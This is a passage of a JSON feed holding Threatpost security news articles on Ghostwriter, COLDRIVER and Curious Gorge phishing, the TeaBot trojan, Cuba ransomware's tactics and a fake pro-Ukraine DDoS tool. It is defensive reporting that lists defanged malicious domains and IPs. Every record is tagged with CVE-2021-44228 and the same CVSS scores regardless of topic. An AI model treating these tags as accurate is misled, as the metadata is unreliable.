controlled domain,\u201d TAG researchers said.\n\nTAG has recently observed Ghostwriter credential-phishing on these domains:\n\n * login-verification[.]top\n * login-verify[.]top\n * ua-login[.]top\n * secure-ua[.]space\n * secure-ua[.]top\n\n## Other Campaigns Launched by Government-Backed Actors in China, Iran, North Korea & Russia\n\nSince early March, Ghostwriter\u2019s use of BitB is only one of a trio of cyber aggressions that TAG [has been tracking](<https://blog.google/threat-analysis-group/update-threat-landscape-ukraine/>) with regards to Russia\u2019s invasion of Ukraine.\n\nThe use of the war as a lure in phishing and malware campaigns has continued to grow throughout the month, TAG said, with associated cyber-assaults coming in from government-backed actors from China, Iran, North Korea and Russia, as well as from various unattributed groups, according to TAG\u2019s Wednesday post.\n\nActors \u201chave used various Ukraine war-related themes in an effort to get targets to open malicious emails or click malicious links,\u201d TAG said.\n\n## Curious Gorge\n\nBesides Ghostwriter\u2019s BitB campaigns, TAG has spotted a group it\u2019s calling Curious Gorge that it attributes to China\u2019s PLA SSF conducting campaigns against government and military organizations in Ukraine, Russia, Kazakhstan and Mongolia.\n\n\u201cWhile this activity largely does not impact Google products, we remain engaged and are providing notifications to victim organizations,\u201d TAG advised.\n\nBelow is a list of IPs used in Curious Gorge campaigns that TAG has recently observed:\n\n * 5.188.108[.]119\n * 91.216.190[.]58\n * 103.27.186[.]23\n * 114.249.31[.]171\n * 45.154.12[.]167\n\n## COLDRIVER\n\nFinally, TAG has also observed COLDRIVER \u2013 a Russia-based threat actor, sometimes referred to as Calisto \u2013 that has launched credential-phishing campaigns targeting several United States-based NGOs and think tanks, the military of a Balkans country, and a Ukraine based defense contractor.\n\nNow, however, for the first time, COLDRIVER is targeting the military of multiple Eastern European countries and a NATO Centre of Excellence, TAG reported.\n\nGoogle doesn\u2019t know how successful these campaigns have been, given that they were issued from newly created Gmail accounts to non-Google accounts. At any rate, Google hasn\u2019t see any Gmail accounts successfully compromised because of these campaigns, TAG said.\n\nRecently observed COLDRIVER credential phishing domains:\n\n * protect-link[.]online\n * drive-share[.]live\n * protection-office[.]live\n * proton-viewer[.]com\n\n**_Moving to the cloud? Discover emerging cloud-security threats along with solid advice for how to defend your assets with our _**[**_FREE downloadable eBook_**](<https://bit.ly/3Jy6Bfs>)**_, \u201cCloud Security: The Forecast for 2022.\u201d_** **_We explore organizations\u2019 top risks and challenges, best practices for defense, and advice for security success in such a dynamic computing environment, including handy checklists._**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-31T18:09:07", "type": "threatpost", "title": "Belarusian \u2018Ghostwriter\u2019 Actor Picks Up BitB for Ukraine-Related Attacks", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-31T18:09:07", "id": "THREATPOST:41B10746D1F4B74DA188CB140A8B2676", "href": "https://threatpost.com/belarusian-ghostwriter-actor-picks-up-bitb-for-ukraine-related-attacks/179210/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-24T20:38:36", "description": "Log4j, ransomware, cloud vulnerabilities, phishing: Cyber threats are manifold. They all pale, however, in comparison to the security black holes that walk around on two legs.\n\nStudies have shown that nearly all successful breaches stem from human error, be it failure to install security patches before an attacker exploits a vulnerability, lousy passwords, or falling into the web of lies spun in [social engineering](<https://threatpost.com/aliens-ufos-frontier-social-engineers/162939/>) or [phishing](<https://threatpost.com/nft-investors-lose-1-7m-in-opensea-phishing-attack/178558/>) attacks.\n\nA 2020 report from Stanford University found that nine out 10 data breaches are caused by users. Research from Stanford University and the security firm Tessian found that[ approximately 88 percent](<https://cisomag.eccouncil.org/psychology-of-human-error-could-help-businesses-prevent-security-breaches/>) of all data breaches are caused by an employee mistake. Similar studies have confirmed these results going back for years: A 2014 report from IBM [found](<https://thehackernews.com/2021/02/why-human-error-is-1-cyber-security.html#:~:text='Human%20error%20was%20a%20major,in%2095%25%20of%20all%20breaches.&text=Mitigation%20of%20human%20error%20must,cyber%20business%20security%20in%202021.>) that human error was \u201ca major contributing cause\u201d in 95 percent of all breaches.\n\n![specops logo](https://media.threatpost.com/wp-content/uploads/sites/103/2020/06/16111526/Specops-Logo.png)\n\n(Brought to you by SpecOps. Underwriters of Threatpost podcasts do not assert any editorial control over content.)\n\nAccording to IBM, the average cost of those breaches has been[ doubling yearly](<https://www.ibm.com/security/data-breach>) from 2020 to date.You can install cutting-edge artificial intelligence solutions or other modern anti-malware and threat detection software to detect anomalous behavior, but technical solutions only go so far, given that carbon-based life forms use them.\n\nHowever, these programs often aren\u2019t tailored to individuals\u2019 roles and responsibilities. They also tend to be boring. Darren Van Booven, lead principal consultant at Trustwave and cybersecurity training expert, visited the Threatpost podcast to talk about how the right cybersecurity awareness program should be conducted at the right pace by well-informed instructors.\n\nWhat also doesn\u2019t hurt: getting senior management to support decent cybersecurity training programs, bringing in notable speakers, making sure management is role-modeling good security hygiene, casting coworkers in cybersecurity awareness skits and/or passing out squeezie stress-balls shaped like phish.\n\nWhatever it takes!\n\nYou can download the podcast below or [listen here](<http://traffic.libsyn.com/digitalunderground/022222_Trustwave_Darren_van_Boofen_mixdown.mp3>). For more podcasts, check out Threatpost\u2019s [podcast site](<https://threatpost.com/microsite/threatpost-podcasts-going-beyond-the-headlines/>).\n\n_**Check out our free **_[_**upcoming live and on-demand online town halls**_](<https://threatpost.com/category/webinars/>)_** \u2013 unique, dynamic discussions with cybersecurity experts and the Threatpost community.**_\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-02-24T14:00:50", "type": "threatpost", "title": "The Art of Non-boring Cybersec Training\u2013Podcast", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-02-24T14:00:50", "id": "THREATPOST:95BDCA2096B58A0697E169C01B1E0F09", "href": "https://threatpost.com/the-art-of-non-boring-cybersec-training-podcast/178594/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-02T22:50:57", "description": "The TeaBot banking trojan \u2013 also known as \u201cAnatsa\u201d \u2013 has been spotted on the Google Play store, researchers from Cleafy have [discovered](<https://www.cleafy.com/cleafy-labs/teabot-is-now-spreading-across-the-globe>).\n\nThe malware \u2013 designed to intercept SMS messages and login credentials from unwitting users \u2013 affected users of \u201cmore than 400 banking and financial apps, including those from Russia, China, and the U.S,\u201d its report claims.\n\nThis isn\u2019t the first time TeaBot has terrorized Android users.\n\n## TeaBot Just Won\u2019t Die\n\nTeaBot was first [discovered](<https://threatpost.com/threat-actors-androids-flubot-teabot-campaigns/177991/>) last year. It\u2019s a relatively straightforward malware designed to siphon banking, contact, SMS and other types of private data from infected devices. What makes it unique \u2013 what gives it such staying power \u2013 is the clever means by which it spreads.\n\nTeaBot requires no malicious email or text message, no fraudulent website or third-party service. Instead, it typically comes packaged in a dropper application. Droppers are programs that seem legitimate from the outside, but in fact act as vehicles to deliver a second-stage malicious payload.\n\nTeaBot droppers have masked themselves as ordinary QR code or PDF readers. Hank Schless, senior manager of security solutions at Lookout, explained via email that attackers \u201cusually stick to utility apps like QR code scanners, flashlights, photo filters, or PDF scanners because these are apps that people download out of necessity and likely won\u2019t put as much time into looking at reviews that might impact their decision to download.\u201d\n\nThis tactic appears to be effective. In January, an app called QR Code Reader \u2013 Scanner App [was distributing](<https://threatpost.com/fbi-malicious-qr-codes/177902/>) 17 different Teabot variants for a little over a month. It managed to pull in more than 100,000 downloads by the time it was discovered.\n\nOther TeaBot droppers \u2013 [discovered](<https://www.threatfabric.com/blogs/deceive-the-heavens-to-cross-the-sea.html>) by Dutch security firm ThreatFabric last November \u2013 have been packaged under many names, such as QR Scanner 2021, PDF Document Scanner and CryptoTracker. The latest, [according](<https://www.cleafy.com/cleafy-labs/teabot-is-now-spreading-across-the-globe>) to security firm Cleafy, was QR Code & Barcode \u2013 Scanner.\n\n## Why Can\u2019t TeaBot Be Stopped?\n\nApp stores have [policies](<https://www.google.com/about/unwanted-software-policy.html>) and protections aimed at combating malware. Google Play Protect, for example, helps [root out](<https://support.google.com/googleplay/answer/2812853?hl=en>) malicious apps before they\u2019re installed and [scans](<https://developers.google.com/android/play-protect/client-protections>) for evidence of misdoing on a daily basis.\n\nHowever, TeaBot droppers aren\u2019t obviously malicious. They might seem perfectly uninteresting, at least on the surface.\n\nOnce a user opens one of these nondescript apps, they\u2019re prompted to download a software update. The update is, in fact, a second app containing a malicious payload.\n\nIf the user gives their app permission to install software from an unknown source, the infection process begins. Like other Android malware, the TeaBot malware attempts to leverage Accessibility Services. [Such attacks](<https://threatpost.com/alien-android-2fa/159517/>) use an advanced remote access feature that abuses the TeamViewer application \u2013 a remote access and desktop sharing tool \u2013 giving the bad actor behind the malware remote control over the victim\u2019s devices.\n\nThe ultimate goal of these attacks is to retrieve sensitive information such as login credentials, SMS and 2FA codes from the device\u2019s screen, as well as to perform malicious actions on the device, the report said.\n\n## Here\u2019s How TeaBot _Can_ Be Stopped\n\nTeaBot attacks have grown fast. As Cleafy notes, \u201cIn less than a year, the number of applications targeted by TeaBot have grown more than 500%, going from 60 targets to over 400.\u201d\n\nWhat can be done to stop them?\n\n\u201cReal-time scanning of app downloads \u2013 even if the app doesn\u2019t originate from Google Play \u2013 would help to mitigate this issue,\u201d Shawn Smith, director of infrastructure at nVisium, told Threatpost on Wednesday via email, adding that \u201cadditional warning messages when installing app add-ons that aren\u2019t on Google Play could be useful, too.\u201d\n\nLeo Pate, managing consultant at nVisium, also told Threatpost via email on Wednesday that \u201cGoogle could be implementing checks on permissive permissions for applications to run, obtaining lists of specific hardcoded public IPs and domain names. Then, [Google could run] them through various sources to see if they\u2019re \u2018bad.'\u201d\n\nUntil app stores have fixed the problem with droppers, users will have to remain alert, Schless noted. \u201cEveryone knows that they should have antivirus and anti-malware apps on their computers, and our mobile devices shouldn\u2019t be treated any differently.\u201d\n\nRegister Today for [**Log4j Exploit: Lessons Learned and Risk Reduction Best Practices**](<https://bit.ly/3BXPL6S>) \u2013 a LIVE **Threatpost event** sked for Thurs., March 10 at 2PM ET. Join Sonatype code **expert Justin Young** as he helps you sharpen code-hunting skills to reduce attacker dwell time. Learn why Log4j is still dangerous and how SBOMs fit into software supply-chain security. [Register Now for this one-time FREE event](<https://bit.ly/3BXPL6S>), Sponsored by Sonatype.\n\n![](https://slack-imgs.com/?c=1&o1=ro&url=https%3A%2F%2Fmedia.threatpost.com%2Fwp-content%2Fuploads%2Fsites%2F103%2F2022%2F02%2F25090838%2FLog4J.jpg)\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-02T22:50:09", "type": "threatpost", "title": "TeaBot Trojan Haunts Google Play Store, Again", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-02T22:50:09", "id": "THREATPOST:FE7B13B35ED49736C88C39D5279FA3D1", "href": "https://threatpost.com/teabot-trojan-haunts-google-play-store/178738/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-25T20:31:43", "description": "The ransomware gang known as \u201cCuba\u201d is increasingly shifting to exploiting Microsoft Exchange vulnerabilities \u2013 including [ProxyShell](<https://threatpost.com/proxyshell-attacks-unpatched-exchange-servers/168879/>) and [ProxyLogon](<https://threatpost.com/microsoft-exchange-servers-proxylogon-patching/165001/>) \u2013 as initial infection vectors, researchers have found.\n\nThe group has likely been prying open these chinks in victims\u2019 armor as early as last August, Mandiant [reported](<https://www.mandiant.com/resources/unc2596-cuba-ransomware>) on Wednesday.\n\nMandiant, which tracks the threat actor as UNC2596, noted that the group deploys the COLDDRAW ransomware. In fact, Cuba may be the only group that uses COLDDRAW: At least, it\u2019s the only threat actor using it among those tracked by Mandiant, \u201cwhich may suggest it\u2019s exclusively used by the group,\u201d researchers said.\n\n## Cuba Has Rated an FBI Warning\n\nIn a December [flash alert](<https://www.ic3.gov/Media/News/2021/211203-2.pdf>), the FBI [attributed](<https://threatpost.com/cuba-ransomware-gang-44m-payouts/176790/>) a spate of attacks \u2013 on at least 49 U.S. entities in the financial, government, healthcare, manufacturing and information-technology sectors \u2013 to the group. For what it\u2019s worth, Mandiant hasn\u2019t seen Cuba attacking hospitals or other entities that provide urgent care.\n\nAt the time, the FBI noted that the Cuba ransomware is distributed using a first-stage implant that acts as a loader for follow-on payloads: the Hancitor malware, which has been around for [at least five years](<https://threatpost.com/hancitor-downloader-shifts-attack-strategy/120040/>).\n\nThis isn\u2019t the first time that Cuba has shown a taste for [Exchange vulnerabilities](<https://threatpost.com/tortilla-exchange-servers-proxyshell/175967/>), either. They\u2019re just one way that Hancitor operators gain initial access to target machines: Other avenues include phishing emails, and the exploitation of compromised credentials or legitimate Remote Desktop Protocol (RDP) tools, according to the FBI\u2019s December alert.\n\n## Microsoft Exchange Action\n\nTrue to form, Mandiant observed the group \u201cfrequently\u201d picking apart vulnerabilities on public-facing Microsoft Exchange infrastructure as an initial compromise vector. \u201cThe threat actors likely perform initial reconnaissance activities to identify internet-facing systems that may be vulnerable to exploitation,\u201d researchers said.\n\nNext, Cuba deployed webshells to establish a foothold in the compromised network. Then, the actors planted backdoors to establish a foothold, including the publicly available NetSupport RAT, as well as BEACON and BUGHATCH, which have been deployed using the TERMITE in-memory dropper.\n\nThe operators have mainly used credentials from valid accounts to escalate privileges, researchers noted. It\u2019s not always clear where they got the credentials from, but at least in some cases, they were stolen with credential-stealing tools such as Mimikatz and WICKER.\n\n\u201cWe have also observed these threat actors manipulating or creating Windows accounts and modifying file access permissions,\u201d researchers added. In one intrusion, the threat actor created a user account and added it to the admin and RDP groups, they said.\n\n## Infection Chain\n\nIn order to identify active network hosts to potentially encrypt and files to exfiltrate, Cuba has used WEDGECUT, a reconnaissance tool, which sends PING requests to a list of hosts generated by a PowerShell script that enumerates the Active Directory.\n\nThen, the crooks peek around to see what files might be of interest. They also routinely use a script to map all drives to network shares, \u201cwhich may assist in user file discovery,\u201d researchers noted.\n\nCuba threat actors have used several methods for lateral movement, including RDP, SMB, and PsExec, \u201cfrequently using BEACON to facilitate this movement,\u201d Mandiant said. Then they deploy various backdoors, including NetSupport, as well as BEACON and BUGHATCH, which are often deployed using the TERMITE in-memory dropper.\n\nTo finish up their extortion work, the gang tries to steal files and encrypt networked machines, threatening to publish to the shaming site exfiltrated data belonging to organizations that balk at paying ransom.\n\n## More Tools, More Malware\n\nAccording to Mandiant\u2019s report, Cuba is using webshells to load the TERMITE dropper: a password-protected, memory-only dropper with an encrypted shellcode payload. The payloads have included BEACON malware, the Metasploit stager or the group\u2019s custom BUGHATCH downloader.\n\nCuba isn\u2019t the only threat actor using the TERMITE dropper: Mandiant said that it\u2019s apparently used by \u201ca limited number\u201d of threat actors.\n\nOver the course of six months, collected TERMITE payloads show that its keepers have been grooming TERMITE, tweaking it so as to better burrow in and evade detections, researchers said.\n\n## Custom-Rolled Malware & Tools\n\nBeyond common, mainstay malware tools such as Cobalt Strike and [NetSupport](<https://malwiki.org/index.php?title=NetSupport_Manager>), Mandiant\u2019s analysis showed that Cuba has some novel malware up its sleeve, including:\n\n**BURNTCIGAR**: a utility that terminates endpoint security software.\n\n**WEDGECUT**: a reconnaissance tool that checks to see whether a list of hosts or IP addresses are online.\n\n**BUGHATCH**: a custom downloader that receives commands and code from a command-and-control (C2) server to execute on a compromised system.\n\nThe researchers noted that when COLDDRAW was deployed, Cuba used what they called \u201ca multi-faceted extortion model\u201d \u2013 i.e., besides encrypting data, the gang leaked it on the group\u2019s shaming site, which is depicted below in all its cigar-chomping glory.\n\n[![](https://media.threatpost.com/wp-content/uploads/sites/103/2022/02/25121905/Cuba-ransomware-shaming-site-e1645809565513.png)](<https://media.threatpost.com/wp-content/uploads/sites/103/2022/02/25121905/Cuba-ransomware-shaming-site-e1645809565513.png>)\n\nCuba ransomware\u2019s shaming site. Source: Mandiant.\n\n## Who Does Cuba Love the Best?\n\nThe majority \u2013 80 percent \u2013 of organizations victimized by Cuba are based in North America, but Cuba loves the United States more than anywhere. As shown by the victim map below, the United States is Cuba\u2019s favorite target, followed by Canada, though the group does go after European countries and other regions.\n\n[![](https://media.threatpost.com/wp-content/uploads/sites/103/2022/02/25122040/cuba-ransomware-victims-per-country-e1645809655324.png)](<https://media.threatpost.com/wp-content/uploads/sites/103/2022/02/25122040/cuba-ransomware-victims-per-country-e1645809655324.png>)\n\nCuba ransomware victims by country. Source: Mandiant.\n\nIts favorite industry sector to pick on is manufacturing, followed by financial services.\n\nWith regards to the victims listed on its shaming site \u2013 which the gang has had up since only early 2021 \u2013 Cuba provides a victim list for free, but it also keeps a separate list that you have to pay to see. Mandiant bit the bullet and sprang for that paid section.\n\nIt was sparse, to say the least: \u201c[The] paid section \u2026 listed only a single victim at the time of publication,\u201d its report said.\n\n**_Moving to the cloud? Discover emerging cloud-security threats along with solid advice for how to defend your assets with our _**[**_FREE downloadable eBook_**](<https://bit.ly/3Jy6Bfs>)**_, \u201cCloud Security: The Forecast for 2022.\u201d_** **_We explore organizations\u2019 top risks and challenges, best practices for defense, and advice for security success in such a dynamic computing environment, including handy checklists._**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-02-25T19:46:57", "type": "threatpost", "title": "Microsoft Exchange Server Bugs Exploited by 'Cuba' Ransomware Gang", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-02-25T19:46:57", "id": "THREATPOST:09118C676E28AC5D7BB791E76F75453C", "href": "https://threatpost.com/microsoft-exchange-exploited-cuba-ransomware/178665/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-09T14:11:27", "description": "Crooks are crooks, right?\n\nWhatever motivates serial violent offenders doesn\u2019t switch off when they stop mugging people and instead pick up a keyboard to transform into cyber actors who craft cyber threats.\n\nAt least, that was the thinking behind the 2012 creation of the FBI\u2019s Cyber Behavioral Analysis Center (CBAC).\n\n\u201cBehavioral characteristics and motivations of cybercriminals in the real world and virtual world are the same,\u201d said Crane Hassold, who helped to create the CBAC after spending more than 11 years as an FBI analyst, offering strategic and tactical analytical support to cyber, financial crime and violent crime cases. \u201cThe only thing that differentiates them is their choice to use a computer to facilitate a crime.\u201d\n\nDuring his stint at the FBI, Hassold researched a slew of cyber threat flavors: malware, network intrusions, denial-of-service attacks, botnets, phishing and hacktivism. He also served as a subject matter expert who trained others on collecting and analyzing open-source intelligence (OSINT) to identify investigative leads and adversary attribution. As well, Hassold spent his days scouring digital evidence to identify behavioral artifacts and investigative leads and reverse-engineering malicious code to better understand adversary motivations and tactics.\n\nNow, he\u2019s director of threat intelligence at cloud-native email security platform Abnormal Security.\n\nAfter having honed his skills in the behavioral analysis unit, Hassold now goes undercover to connect with attackers directly, unfettered by the red tape of working at a law enforcement agency.\n\nHe\u2019s got some interesting stories: stories about looking at cyber threats at a more human level, about delving into more than the tools, techniques and procedures (TTPs) \u2013 all those technical bells and whistles of cybercrime.\n\nHassold visited the Threatpost podcast recently to share his stories about using the concepts built by the FBI to understand how criminals exploit victims\u2019 behavior in [business email compromise (BEC)](<https://threatpost.com/bec-losses-top-18b/167148/>), about engaging with BEC actors (first covertly and then overtly), and more. As well, he shared some key findings from Abnormal\u2019s recent [report](<https://abnormalsecurity.com/resources/ransomware-victims-threat-actors>) about ransomware.\n\nYou can download the podcast below or [listen here](<http://traffic.libsyn.com/digitalunderground/MULTITRACK_MIXDOWN_020822_Crane_Hassold_Abnormal_Security.mp3>). For more podcasts, check out[ Threatpost\u2019s podcast site](<https://threatpost.com/category/podcasts/>).\n\n_**Check out our free **_[_**upcoming live and on-demand online town halls**_](<https://threatpost.com/category/webinars/>)_** \u2013 unique, dynamic discussions with cybersecurity experts and the Threatpost community.**_ \n\n\n(Brought to you by [Specops Technology](<http://www.specopssoft.com/threatpost>). _Underwriters of Threatpost podcasts do not assert any editorial control over content._)\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-02-09T14:00:57", "type": "threatpost", "title": "Ex-Gumshoe Nabs Cybercrooks with FBI Tactics", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-02-09T14:00:57", "id": "THREATPOST:B796D491D9E59A6CE14A74FFE427D175", "href": "https://threatpost.com/gumshoe-nabs-cybercrooks-fbi-tactics/178298/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-11T14:53:17", "description": "Looking to cyber-hassle Russia, Ukrainian sympathizers? Be careful \u2014 malware is making the rounds, disguised as a pro-Ukraine cyber-tool that will turn around and bite you instead, researchers are warning.\n\nIn a Wednesday [threat advisory](<https://blog.talosintelligence.com/2022/03/threat-advisory-cybercriminals.html>), Cisco Talos described a campaign it\u2019s observed in which a threat actor was offering a supposed distributed denial-of-service (DDoS) tool on Telegram, that\u2019s purportedly meant to pummel Russian websites.\n\nIn truth, the file is actually the Phoenix infostealer that\u2019s after credentials and cryptocurrency info, according to researchers.\n\n[Phoenix](<https://socprime.com/news/phoenix-malware-evolves-from-keylogger-to-infostealer/>) is a keylogger that emerged in the summer of 2019 and which had, within months, turned into a full-fledged infostealer with powerful anti-detection and anti-analysis modules.\n\n[Phoenix](<https://socprime.com/news/phoenix-malware-evolves-from-keylogger-to-infostealer/>) is a keylogger that emerged in the summer of 2019 and which had, within months, turned into a full-fledged infostealer with powerful anti-detection and anti-analysis modules.\n\nResearchers shared one such Telegram come-on, shown below:\n\n[![](https://media.threatpost.com/wp-content/uploads/sites/103/2022/03/10114749/infostealer-disguised-as-Russian-attack-tool-e1646930888523.jpg)](<https://media.threatpost.com/wp-content/uploads/sites/103/2022/03/10114749/infostealer-disguised-as-Russian-attack-tool-e1646930888523.jpg>)\n\nInfostealer disguised as a Russian attack tool on Telegram. Source: Cisco Talos.\n\n\u201cWe are glad to remind you about the software we use to attack Russian sites!\u201d the message burbled, waiting to jump on unsuspecting users so as to bleed them of cryptocurrency stored in wallets and MetaMask (a cryptocurrency wallet software commonly associated with non-fungible tokens [NFTs]).\n\n## Cyber-Warzone Flooded with New Threats, Hacker Newbies\n\nThe malware dressed in sheep\u2019s clothing is just one more wrinkle in the cyber-threat landscape \u2013 a landscape that been undergoing seismic shifts leading up to and during Russia\u2019s invasion of Ukraine. The crisis has brought both new threats and an influx of actors \u201cof varying skill,\u201d Cisco said.\n\nFor example, the cyber-warzone has entailed the Conti ransomware gang\u2019s secrets [getting spilled](<https://threatpost.com/ukraine-russia-cyber-warzone-splits-cyber-underground/178693/>) (including a [decryptor and TrickBot code](<https://threatpost.com/conti-ransomware-decryptor-trickbot-source-code-leaked/178727/>)) by a Ukrainian security researcher (per [KrebsOnSecurity](<https://krebsonsecurity.com/2022/03/conti-ransomware-group-diaries-part-i-evasion/>), citing Alex Holden, the Ukrainian-born founder of the Milwaukee-based cyber intelligence firm Hold Security), a pro-Ukrainian member; furious phishing campaigns [launched](<https://threatpost.com/russian-apts-phishing-ukraine-google/178819/>) against Ukraine and [those aiding](<https://threatpost.com/phishing-campaign-targeted-those-aiding-ukraine-refugees/178752/>) Ukrainian refugees; the novel FoxBlade [trojan;](<https://threatpost.com/microsoft-ukraine-foxblade-trojan-hours-before-russian-invasion/178702/>) DDoS [attacks](<https://threatpost.com/ukrainian-ddos-attacks-should-put-us-on-notice-researchers/178498/>) against Ukraine\u2019s military and economy; campaigns using multiple destructive [wipers;](<https://threatpost.com/destructive-wiper-ukraine/177768/>) hackers affiliating themselves with the Anonymous collective [hijacking](<https://www.taiwannews.com.tw/en/news/4466470>) Russian cameras; and more.\n\n\u201cMany of these changes have been brought about by the rise in attacks being[ outsourced](<https://twitter.com/FedorovMykhailo/status/1497642156076511233>) to sympathetic people on the internet, which brings about its own unique challenges and threats,\u201d Cisco [outlined](<https://blog.talosintelligence.com/2022/03/ukraine-update.html>). The threat advisory referenced a [tweet](<https://twitter.com/FedorovMykhailo/status/1497642156076511233>) exhorting people to join an IT army to fight on the cyber-front.\n\n> We are creating an IT army. We need digital talents. All operational tasks will be given here: <https://t.co/Ie4ESfxoSn>. There will be tasks for everyone. We continue to fight on the cyber front. The first task is on the channel for cyber specialists.\n> \n> \u2014 Mykhailo Fedorov (@FedorovMykhailo) [February 26, 2022](<https://twitter.com/FedorovMykhailo/status/1497642156076511233?ref_src=twsrc%5Etfw>)\n\nSoldiers on the frontlines get shot at, of course, and soldiers on the cyber-frontlines run the risk of getting arrested. After all, no matter how noble the hacking cause, it\u2019s still potentially illegal, Cisco pointed out.\n\n## \u2018Legitimate\u2019 Disbalancer Liberator DDoS Tool\n\nThe malware in the Telegram message brands itself as a \u201cDisbalancer\u201d .ZIP file. There is, in fact, a group called \u201cdisBalancer\u201d that distributes a \u201clegitimate\u201d DDoS attack tool called, ironically enough, Liberator, Cisco found \u2013 a tool for waging cyberwar against \u201cRussian propaganda websites.\u201d\n\n\u201cA quick look at disBalancer\u2019s website shows that the actor uses similar language to the malicious message on Telegram\u2026and promises to target Russian sites with the stated goal of helping to \u2018liberate\u2019 